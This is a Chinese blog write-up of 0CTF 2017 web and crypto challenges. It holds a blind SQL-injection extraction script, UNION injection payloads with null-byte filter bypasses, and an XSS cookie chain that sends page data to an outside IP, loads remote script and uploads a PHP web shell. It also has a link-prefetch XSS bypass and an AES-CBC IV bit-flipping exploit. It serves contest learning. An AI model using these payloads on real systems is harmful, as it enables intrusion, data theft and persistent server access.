0CTF2017 WEB WriteUp

最新推荐文章于 2024-06-02 12:00:23 发布
最新推荐文章于 2024-06-02 12:00:23 发布
阅读量9.7k 收藏 2
点赞数 1
分类专栏: WriteUp Web 文章标签: web 0ctf2017 ctf writeup
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_19876131/article/details/64125711
版权
Web 同时被 2 个专栏收录
34 篇文章 2 订阅
订阅专栏
WriteUp
24 篇文章 0 订阅
订阅专栏

0CTF2017 WEB WriteUp

新博客地址:http://bendawang.site/article/0CTF2017-WEB-WriteUp(ps:短期内csdn和新博客会同步更新)

Temmo’s Tiny Shop

这道题运气比较好,一进去就有很多钱,然后直接买到hint了,后来像是修复了,hint内容也做了修改,不过还是有问题,我重新申请了一个号,发现越买钱越多,然后就直接买到hint了,在后来写wp的时候去申请发现无论怎么酒只有4000,最后做完题看到flag,知道这是个条件竞争的题。
不说了,先直接说最后的注入把,因为前面的步骤由于出题方的失误我们直接就能跳过了。
最后hint就是

select flag from ce63e444b0d049e9c899c9a0336b3c59

显然就是寻找注入点,后来在这里找到了注入点,搜索那儿的order by,然后随便买两个东西,比如这两个

这里写图片描述

然后在我们输入下面payload时

?action=search&keyword=&order=if(substr((select(flag)from(ce63e444b0d049e9c899c9a0336b3c59)),1,1)like(0x00),price,name)

结果为:

这里写图片描述

而输入下面的时候

?action=search&keyword=&order=if(substr((select(flag)from(ce63e444b0d049e9c899c9a0336b3c59)),1,1)like(0x46),price,name)

结果变成了

这里写图片描述

所以通过if然后根据其按照什么进行排序就能够成功判断每一位的flag
最后脚本如下:

import requests
r=requests.session()
url="http://202.120.7.197/app.php"
header={"Cookie":"PHPSESSID=5h8kk889lad5a6akggcm14bgr7"}
ans=""
for i in xrange(1,100):
    for j in xrange(256):
        if j==37:
            continue
        param="?action=search&keyword=&order=if(substr((select(flag)from(ce63e444b0d049e9c899c9a0336b3c59)),{length},1)like({num}),price,name)".format(length=str(i),num=hex(j))
        print param
        content=r.get(url+param,headers=header).content
        #print content
        print j
        if content.find('"id":"5"')>content.find('"id":"2"'):
            print j
            ans+=chr(j)
            print ans.lower()
            break

这里写图片描述

替换下大括号就行了。

King of Glory Player List

一道调试js的题,看了源码主要部分如下:

function go()
{
    args = GetUrlParms();
    if(args["id"]!=undefined)
    {
        var value = args["id"];
        var ar = Module.main(value).split("|");
        if(ar.length==3)
        {
            var s = "http://202.120.7.213:11181/api.php?id=" + args["id"] + "&hash=" + ar[0] + "&time=" + ar[1];
            window.location.href=s;
            $(document).ready(function(){
              content=$.ajax({url:s, async:false});
              $("#output").html(content.responseText);
            });

        }
        if((ar.length==1)&(ar[0]=='WrongBoy'))
        {
            alert('Hello Hacker~');
        }
    }
}

源码会根据我们输入调用Module.main()函数,如果我们输入有敏感字符,就会返回wrongboy,否则返回正常的格式,包括hash
也就是我们的核心目的就是要在我们非正常输入的情况下让它返回正常的格式然后进行相关操作。
所以我们只需要开两个窗口,一个正常输入,一个非正常输入,然后借助浏览器的调试器进行调试js就可以了,开始用的火狐的,卡爆了,后来换成chrome就流畅了。之前HCTF2016也有类似的题。
单步跟进之后到这里遇到第一个,function.js的7633行的$13变量,正常输入是true,敏感输入是false,

这里写图片描述

那直接修改源码赋为真值就可以了
第二处在这个判断这里

这里写图片描述

这个label的值,正确的时候是0,错的时候是12,即错误了就会进入这个if语句,那么我们直接把它改成if(0)就好了。
之后就没有了,就能正常的注入了,不过由于同源策略的原因,异步请求交不过去,所以把源码改成如下

<!DOCTYPE html>
<html>
<head>
    <title>King of Glory Player List</title>
</head>
<body>
<script
  src="https://code.jquery.com/jquery-3.1.1.min.js"
  integrity="sha256-hVVnYaiADRTO2PzUGmuLJr8BLUSjGIZsDYGmIJLv2b8="
  crossorigin="anonymous"></script>
<script src="function1.js"></script>
<script type="text/javascript">
function GetUrlParms()
{
    var args=new Object();
    var query=location.search.substring(1);
    var pairs=query.split("&");
    for(var i=0;i<pairs.length;i++)
    {
        var pos=pairs[i].indexOf('=');
        if(pos==-1) continue;
        var argname=pairs[i].substring(0,pos);
        var value=pairs[i].substring(pos+1);
        args[argname]=unescape(value);
    }
    return args;
}
function go()
{
    args = GetUrlParms();
    if(args["id"]!=undefined)
    {
        var value = args["id"];
        var ar = Module.main(value).split("|");
        if(ar.length==3)
        {
            var s = "http://202.120.7.213:11181/api.php?id=" + args["id"] + "&hash=" + ar[0] + "&time=" + ar[1];
            window.location.href=s;
            $(document).ready(function(){
              content=$.ajax({url:s, async:false});
              $("#output").html(content.responseText);
            });

        }
        if((ar.length==1)&(ar[0]=='WrongBoy'))
        {
            alert('Hello Hacker~');
        }
    }
}

var wait = setInterval(function(){if(Module.main != undefined){clearInterval(wait);go();}}, 100);

</script>
<center><h1>King of Glory Player List</h1></center>
<center><div id="output"><h2>hmmmm</h2></div></center>
</body>
</html>

function1.js就是我们调整过得,接下来就能正常的发送请求了。

发现服务端并没有再进行过滤了,然后由这个payload

id=1 order by 2
id=1 order by 3

确定是2列了。
然后开始爆破
爆的表名有fl4g,user
fl4g列名就一个hey
所以

?id=1 and 1=2 union select 1,hey from fl4g

拿到flag。

这里写图片描述

simplesqlin

一听名字就大概知道是个sql注入,简单判断下是个数字注入
然后试了试,同样通过orderby判断出有三列。
然后发现select被过滤了,然后发现插入%00之后就能绕过

id=1 and 1=2 union se%00lect 1,2,3

接下来有可以爆破了,之后的from和where都被过滤了。
同样可以插入%00进行绕过,得到表名flag,news
flag表的列名也是flag
所以,payload如下:

id=1 and 1=2 union s%00elect 1,flag,3 fro%00m flag

这里写图片描述

complicated xss

这道题坑了我好久啊。。。
爆破md5就不说了,遇见的次数已经太多了。直接主题
首先是正常的xss点,说是让你访问http://admin.government.vip:8000就能拿到flag了,然后我们试图访问一下这个网页发现有个默认用户,登陆进去之后打印了用户名,即cookie里面username值,那我们的想法就是想办法伪造带标签的cookie,然后跳转过去之后就能执行标签页内容。
另外需要注意的是

这里写图片描述

在这个页面上述的函数都无法使用。

然后我们开始尝试

<script>
 function setCookie(name,value,seconds) {
 seconds = seconds || 0; //seconds有值就直接赋值,没有为0,这个根php不一样。
 var expires = "";
 if (seconds != 0 ) { //设置cookie生存时间
 var date = new Date();
 date.setTime(date.getTime()+(seconds*1000));
 expires = "; expires="+date.toGMTString();
 }
 document.cookie = name+"="+value+expires+";path=/;domain=.government.vip"; //转码并赋值

}
setCookie('username',String.fromCharCode(60,115,118,103,32,111,110,108,111,97,100,61,108,111,99,97,116,105,111,110,46,104,114,101,102,61,39,104,116,116,112,58,47,47,49,48,52,46,49,54,48,46,52,51,46,49,53,52,58,49,50,51,52,53,47,63,97,61,39,43,101,115,99,97,112,101,40,100,111,99,117,109,101,110,116,46,98,111,100,121,46,105,110,110,101,114,72,84,77,76,41,62),1000);
location.href='http://admin.government.vip:8000/';
</script>

通过这个代码我们成功跳转了过去并且拿到了返回值。
结果目的网页的内容是一个上传表单如下:

<p>Upload your shell</p>
<form action="/upload" method="post" enctype="multipart/form-data">
<p><input type="file" name="file"></p>
<p><input type="submit" value="upload">
</p></form>

也就是说我们还要在http://admin.government.vip:8000页面下执行post请求上传文件,构造了好久,最后还是觉得jquery好用啊。
最后这里引入了iframe,然后利用this.contentWindow对象来绕过eval的执行。
最后构造如下:

 <script>
 function setCookie(name, value, seconds) {
 seconds = seconds || 0; //seconds有值就直接赋值,没有为0,这个根php不一样。
 var expires = "";
 if (seconds != 0 ) { //设置cookie生存时间
 var date = new Date();
 date.setTime(date.getTime()+(seconds*1000));
 expires = "; expires="+date.toGMTString();
 }
 document.cookie = name+"="+value+expires+";path=/;domain=.government.vip"; //转码并赋值
}
setCookie('username','<iframe onload=this.contentWindow.eval(String.fromCharCode(118,97,114,32,98,100,119,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,115,99,114,105,112,116,34,41,59,98,100,119,46,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,98,101,110,100,97,119,97,110,103,46,115,105,116,101,58,56,48,48,48,47,109,121,106,115,47,117,112,108,111,97,100,95,97,106,97,120,46,106,115,34,59,100,111,99,117,109,101,110,116,46,104,101,97,100,46,97,112,112,101,110,100,67,104,105,108,100,40,98,100,119,41,59))></iframe>',1000)
location.href='http://admin.government.vip:8000/';
</script>

中间那一串的String.fromCharCode就是

var bdw=document.createElement("script");bdw.src="http://www.bendawang.site:8000/myjs/upload_ajax.js";document.head.appendChild(bdw);

然后在我的vps上我的upload_ajax.js如下:

var t=document.getElementsByTagName("script")[0];
var sss=document.createElement("script");
sss.src="http://government.vip/static/jquery.min.js";
document.head.insertBefore(sss,t);

var body = "------WebKitFormBoundaryFikh4XTsUA3KuSES\r\n" +
  "Content-Disposition: form-data; name=\"233\"\r\n" +
  "\r\n" +
  "eyJzY3JlZW5faGVpZ2h0Ijo4MjYsInNjcmVlbl93aWR0aCI6MTQ0MH0\r\n" +
  "------WebKitFormBoundaryFikh4XTsUA3KuSES\r\n" +
  "Content-Disposition: form-data; name=\"source_flag\"\r\n" +
  "\r\n" +
  "0\r\n" +
  "------WebKitFormBoundaryFikh4XTsUA3KuSES\r\n" +
  "Content-Disposition: form-data; name=\"file\"; filename=\"shell.php\"\r\n" +
  "Content-Type: image/png\r\n" +
  "\r\n" +
  "GIF89a\x3c?php eval($_REQUEST[A]);?\x3e\x3c/script\x3e\r\n" +
  "------WebKitFormBoundaryFikh4XTsUA3KuSES--\r\n";

setTimeout("makeRequest()",1000)

function makeRequest() {
    var settings = {
        type: "POST",
        url:"http://admin.government.vip:8000/upload",
        data:body,
        success: function(data,textStatus) {
            $.get('http://104.160.43.154:12345?a=123+'+data);
        },
        headers: {
            "Access-Control-Allow-Headers":"X-Requested-With",
            "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryFikh4XTsUA3KuSES",
            "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
            "Accept-Language":"zh-CN,zh;q=0.8"
        }
    };
    $.ajax(settings);
}

中间的延迟是为了让我创建的引入jquery的标签生效,这样makeRequest才能正常执行,最后这里要吐槽的是我用的火日大佬的xss平台,每次服务器给我的平台发请求,我的平台就崩了,导致最后只能使用nc监听端口,蓝瘦,下面是截图

这里写图片描述

simple xss

同样的套路,用md5和验证码防爆破,目的就是绕过过滤执行js拿回flag.php下数据
然后好的就是这个可以测试
经过一番fuzz之后发现一下重要符号被过滤

' " : / > . ( ) &  # , % ; ?等等

首先简单确认之后我们可以引入像是script,img,svg,link等关键标签。
这么多过滤势必没办法直接执行语句访问flag.php,那么就想到要么引入我们自己的js,要么加载我们写的界面。然后要输入网址的话,既然说了是最新版本的chrome,就可以用绕过.,然后就是用\\使得其用当前协议https访问链接,payload如下:

<link rel=prefetch href=\\61dclub。com\x
还有import,以及prerender应该也可以不过没有尝试,凡是预加载和预渲染已经直接调用理论上都可以

这里写图片描述

crypto-integrity

首先拿到源代码如下:

#!/usr/bin/python -u

from Crypto.Cipher import AES
from hashlib import md5
from Crypto import Random
from signal import alarm

BS = 16
pad = lambda s: s + (BS - len(s) % BS) * chr(BS - len(s) % BS)
unpad = lambda s : s[0:-ord(s[-1])]


class Scheme:
    def __init__(self,key):
        self.key = key

    def encrypt(self,raw):
        raw = pad(raw)
        raw = md5(raw).digest() + raw

        iv = Random.new().read(BS)
        cipher = AES.new(self.key,AES.MODE_CBC,iv)

        return ( iv + cipher.encrypt(raw) ).encode("hex")

    def decrypt(self,enc):
        enc = enc.decode("hex")

        iv = enc[:BS] ##前16位
        enc = enc[BS:] ##之后

        cipher = AES.new(self.key,AES.MODE_CBC,iv)
        blob = cipher.decrypt(enc)

        checksum = blob[:BS]
        data = blob[BS:]

        if md5(data).digest() == checksum:
            return unpad(data)
        else:
            return

key = Random.new().read(BS)
scheme = Scheme(key)

flag = open("flag",'r').readline()
alarm(30)

print "Welcome to 0CTF encryption service!"
while True:
    print "Please [r]egister or [l]ogin"
    cmd = raw_input()

    if not cmd:
        break

    if cmd[0]=='r' :
        name = raw_input().strip()

        if(len(name) > 32):
            print "username too long!"
            break
        if pad(name) == pad("admin"):
            print "You cannot use this name!"
            break
        else:
            print "Here is your secret:"
            print scheme.encrypt(name)


    elif cmd[0]=='l':
        data = raw_input().strip()
        name = scheme.decrypt(data)

        if name == "admin":
            print "Welcome admin!"
            print flag
        else:
            print "Welcome %s!" % name
    else:
        print "Unknown cmd!"
        break

初步想法是padding oracle,但是后来看到有个alarm(30),只有30s的话就不可能是padding oracle了,因为就这个通信速度来看30s完全差得远。
也就是说有别的解法了。
然后想到hash长度扩展攻击的原理。
这里有点类似的。
比如我注册一个账户是admin\0b\0b\0b\0b\0b\0b\0b\0b\0b\0b\0bbdw
然后服务端返回如下:

f751a16eae391dd0f4dbfb5c4a740217  md5值
14c63b729049860cb9905a2ae3d71807  admin\x0b\x0b...
3f17049464bbc44f1bdccde9ea233d1f  bdw\x0d\x0d.....
17ba7e5a78c1fa77811a0c72a519adea  \0x10\0x10......

然后我们想伪造的是

md5值
admin\x0b\x0b...

也就简单了,我们只需要把第一次注册的MD5通过修改IV进行字节翻转成admin\0b\0b\0b\0b\0b\0b\0b\0b\0b\0b\0b的md5就可以了。
所以代码如下:

from pwn import *
from hashlib import md5
N=16
def inject1(cipher):
    print cipher
    con.recvuntil("[l]ogin")
    #con.interactive()
    con.sendline('l')
    con.sendline(cipher)
    content=con.recvuntil("!")
    print content
    if "None" in content:
        return 0
    else:
        return 1

def xor(a, b):
    return "".join([chr(ord(a[i])^ord(b[i%len(b)])) for i in xrange(len(a))])

pad = lambda s:s+(N-len(s)%N)*chr(N-len(s)%N)

def padding_oracle(N,cipher):
    get=""
    for i in xrange(1,N+1):
        for j in xrange(0,256):
            padding=xor(get,chr(i)*(i-1))
            c=chr(0)*(16-i)+chr(j)+padding+cipher
            c=c.encode('hex')
            print c
            if inject1(c):
                get=chr(j^i)+get
                time.sleep(0.1)
                break
    return get

con=remote('202.120.7.217',8221)
con.recvuntil("[l]ogin")
con.sendline('r')
username=pad('admin')+'bdw'
con.sendline(username)
con.recvuntil("secret:")
c=con.recvuntil("P")
print c
iv=c[1:-2].decode('hex')[:16]
cipher=c[1:-2].decode('hex')[16:48]
#middle=padding_oracle(N,cipher)
plaintext=md5(pad(username)).digest()
des=md5(pad("admin")).digest()
tmp=xor(xor(iv,plaintext),des)
inject1((tmp+cipher).encode('hex'))
con.interactive()

这里写图片描述

Bendawang
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
ctfhub web全部做题记录(持续跟新)
01-08
CTF(Capture The Flag)】CTF是一种网络安全竞赛,其中参赛者通过解决各种安全问题来获取“旗标”(代表分数),这些问题通常涉及逆向工程、密码学、Web安全、取证分析等多个领域。 【Web安全】Web安全是网络...
BUUCTF:0ctf_2017_babyheap
weixin_51055545的博客
01-07 1598
一天一道buu 今天做了这道堆题没有想象的难,毕竟是道1分的题 例行检查 64位程序,保护机制全开的,放到IDA 漏洞分析 漏洞在edit()函数中,我们add()之后,在edit()时,能再次控制size的大小,存在堆溢出。 分析好漏洞后,就开始利用 利用思路和分析 1.我们先利用堆溢出泄露出libc地址 2.劫持fd指针到malloc_hook,覆盖malloc_hook为one_gadget,当再次申请堆块时调用one_gadget,从而get shell 分析 首先堆布局,申请0x100的堆,释放
0CTF-2017-web-writeup
dengzhasong7076的博客
03-20 230
xss搞的很爽... complicated xss 题目描述:The flag is in http://admin.government.vip:8000 两个xss点。 1、http://government.vip/ 存储型xss,未做过滤,管理员会触发此xss 202.120.7.205 - - [20/Mar/2017:14:26:18 +0800] "GET /aaakkk...
CTF本地靶场搭建——静态flag题型的创建
最新发布
qq_44373268的博客
06-02 554
静态容器内的内容对所有队伍而言是相同的,并且其中包含的静态flag用于验证队伍是否成功找到了预设的漏洞或完成了特定的安全挑战,而不是通过攻击其他队伍来获取flag。静态flag意味着这些flag是预先设定好的,不会随比赛进程或队伍行为动态改变,与之相对的是动态flag,动态flag可能会根据攻击或防守的情况发生变化。然而,如果要将静态flag的概念映射到更传统的CTF题型上,它可以出现在任何需要验证固定解决方案的题目中,比如在某些**Misc(杂项)或特定情境下的Web、**Crypto(密码学)
网络信息安全攻防学习平台-脚本关 writeup
热门推荐
4ct10n
09-17 2万+
1.key又又找不到了直接burpsuit截断 出flag key is : yougotit_script_now2 .快速口算这道题比较有意思 在两秒钟之内回答他的算术题 思路:直接编写python脚本访问网站,获取html计算算式,得出答案,post传参,注意要建立长连接。 代码如下:#-*-coding:utf-8-*- import requests, re url = '
做了一个XSS的闯关游戏,攻略贴上来
yd0str
12-13 8746
游戏地址: http://xss-quiz.int21h.jp 第一关:比较简单,直接输入 http://xss-quiz.int21h.jp/?sid=2a75ff06e0147586b7ceb0fe68ee443b86a6e7b9 第二关:也相对简单,闭合标签 http://xss-quiz.int21h.jp/stage2.php?sid=f2d7d60125bdddb20
xss跳转代码_XSS跨站脚本攻击-靶场writeup&总结
weixin_39963819的博客
11-21 544
XSS简介XSS(跨站脚本攻击)是指攻击者在网页中嵌入客户端脚本,通常是Javascript编写的恶意代码,当用户使用浏览器浏览被嵌入恶意代码的网页时,恶意代码将在用户的浏览器上被解析执行。XSS Education环境搭建docker search xss # 搜索docker镜像,找到xss education对应的image docker run -d -p {p}:80 {sha} # {...
D3CTF2022-官方WriteUp1
08-03
本文将对 D3CTF 2022 官方 WriteUp1 进行总结,主要涉及 MySQL UDF 提权、Java 反序列化、MySQLInject、Web 短链技术等多方面的知识点。 1. MySQL UDF 提权 在 MySQL 中,可以使用 User-Defined Functions(UDF)...
2018第二届强网杯线上赛ctf web writeup(难度较大)-b64_c3VuJTIwYm95-it720.docx
11-29
本文主要涉及的是网络安全领域中的CTF(Capture The Flag)竞赛,特别是Web安全相关的挑战。在2018年的第二届强网杯线上赛中,存在一系列难度较大的Web题目,这些题目主要测试参赛者的Web安全技能,包括但不限于密码...
CTF-writeup
03-19
在这个CTF-writeup中,我们将主要探讨与JavaScript相关的知识点,这是一种广泛用于Web开发的编程语言,也是CTF比赛中的常见挑战类型。 JavaScript是互联网上动态内容的基础,它允许网页与用户进行交互,执行实时...
阿里云ctf比赛writeup
04-26
阿里云CTF比赛Writeup详解 在网络安全领域,Capture The Flag(CTF)是一种常见的竞赛形式,参赛者通过解决各种安全挑战来展示他们的技术能力。阿里云CTF比赛提供了多种类型的挑战,包括Web、Misc、Pwn、Reverse和...
ctf入门(转载)
wxy201008的博客
08-28 2134
CTF入门指南(0基础) ctf入门指南 如何入门?如何组队? capture the flag 夺旗比赛 类型: Web 密码学 pwn 程序的逻辑分析,漏洞利用windows、linux、小型机等 misc 杂项,隐写,数据还原,脑洞、社会工程、与信息安全相关的大数据 reverse 逆向windows、linux类 ppc 编程类的 国内外著名比赛 国外: 国内:xctf联赛 0ctf上海国...
BugKu Web WriteUp
AlexYoung28的博客
08-24 2200
Web 8 这道题的代码和前面的文件包含写的思路一样, 我们都是运用  php://input 写,来实现我们从文件中读出的数据和我们传入的数据一样。 我写的如下:  只要保证  $ac  的值 和我们写入文件  $fn 的值 一样即可, 我这里都写的是 123 细心 这道题刚开始看到主页之后,又看了源代码和抓了包,发现都没有什么特别的地方,所以,只有拿御剑扫描一下后台。 ...
xss-labs 通关笔记
Ewige的博客
06-30 471
靶场地址:传送门 概述: XSS(跨站脚本)概述 Cross-Site Scripting 简称为“CSS”,为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS。一般XSS可以分为如下几种常见类型: 1.反射性XSS; 反射型XXS是一种非持久性的攻击,它指的是恶意攻击者往Web页面里插入恶意代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意攻击用户的目的。这里插入的恶意代码并没有保存在目标网站,需要引诱用户点击一个链接到目标网站的恶意链接来实施攻击。 原文链接:ht
Web安全--XSS(跨站脚本攻击)
bobo_milk的博客
11-14 813
攻击者向web页面插入恶意可执行脚本代码,当用户浏览该页面时,嵌入到web页面的恶意代码就会被执行,从而达到攻击者盗取用户信息或侵犯用户安全隐私的目的。存储型:代码存放在服务器中,一般在个人信息或留言等地方,每当访问该页面就会触发代码(具有很高隐蔽性)DOM型:处理后的结果会成为页面的一部分,不提交数据到服务器,从客户端获得DOM中的数据在本地执行。存储型:发送一次带有xss代码的请求,以后在这个页面数据包都会有xss代码。反射型:发送一次带有xss代码的请求,只在当前数据包会有xss代码。
白帽子之web漏洞--xss攻击
鼓浪屿岛与海的博客
12-04 473
本文仅供学习,不支持一切以不法利益为目的的商业攻击 一.xss攻击原理 xss 是“跨站脚本攻击”,是一种注入攻击,当web应用对用户输入过滤的不严格时,攻击者写入恶意的脚本(CSS,HTML,JavaScript)到网页中时,如果访问了含有恶意代码的页面,恶意脚本就会被浏览器解析执行导致用户被攻击 二.常见xss危害 cookie窃取,session劫持,钓鱼攻击,蠕虫,ddos等。 ...
kali linux 2.0 web 渗透测试 电子书
weixin_33888907的博客
06-01 438
打起精神,重新开启订阅号的原创文章写作工作,但是需要点时间,请耐心等待。 求资料的同学,没有及时回复的,请再次留言,我会尽快处理。今天分享两本电子书,虽然是英文的,但是难度不高。 第一本是基于Kali 2.0 的web渗透测试 链接: pan.baidu.com/s/1slLgAAD 密码: 8gvn 第二本是基于Hadoop的大数据取证技术 链接: pan.baidu.com/s/1qY37DM...
XSS漏洞-06】XSS漏洞利用案例(浏览器劫持、会话劫持、GetShell)—基于神器beEF
m0_64378913的博客
06-02 4233
(1)了解beEF工具的使用; (2)加深理解XSS漏洞的利用和危害; (3)掌握浏览器劫持的攻击方法; (4)掌握会话劫持的攻击方法; (5)掌握通过XSS漏洞GetShell的方法。
XSS (跨站脚本攻击) 分析与实战
未完成的歌~的博客
01-14 5443
文章目录一、漏洞原理1、XSS简介:2、XSS原理解析:3、XSS的分类:3.1、反射型XSS3.2、存储型XSS3.3、DOM型XSS二、靶场实战XSS实现盗取管理员Cookie并登录: 一、漏洞原理 1、XSS简介: XSS全称:Cross Site Scripting,即跨站脚本攻击,为了不和“层叠样式表”(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSSXSS是最常见的 Web 应用程序安全漏洞之一,这类漏洞能够使攻击者嵌入恶意脚本代码(一般是JS代
xss绕过字符过滤_XSS小技巧绕过云WAF
weixin_39718521的博客
01-04 456
XSS小技巧绕过云WAF0x01最初发现来自实验室的小伙伴,但是仅限于弹窗,后来发现这种类型的payload构造思路来自WriteupXSS挑战第二期Writeup以及使用了fuzz的一些小技巧,可以实现任意js代码执行.绕云waf简单的方式就是绕过cdn,找真实ip,翻一下历史解析记录基本都能找到,也有一些工具,比如我在另一篇文章集的fuckcdn有些时候绕不过去cdn,又存在xss漏...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值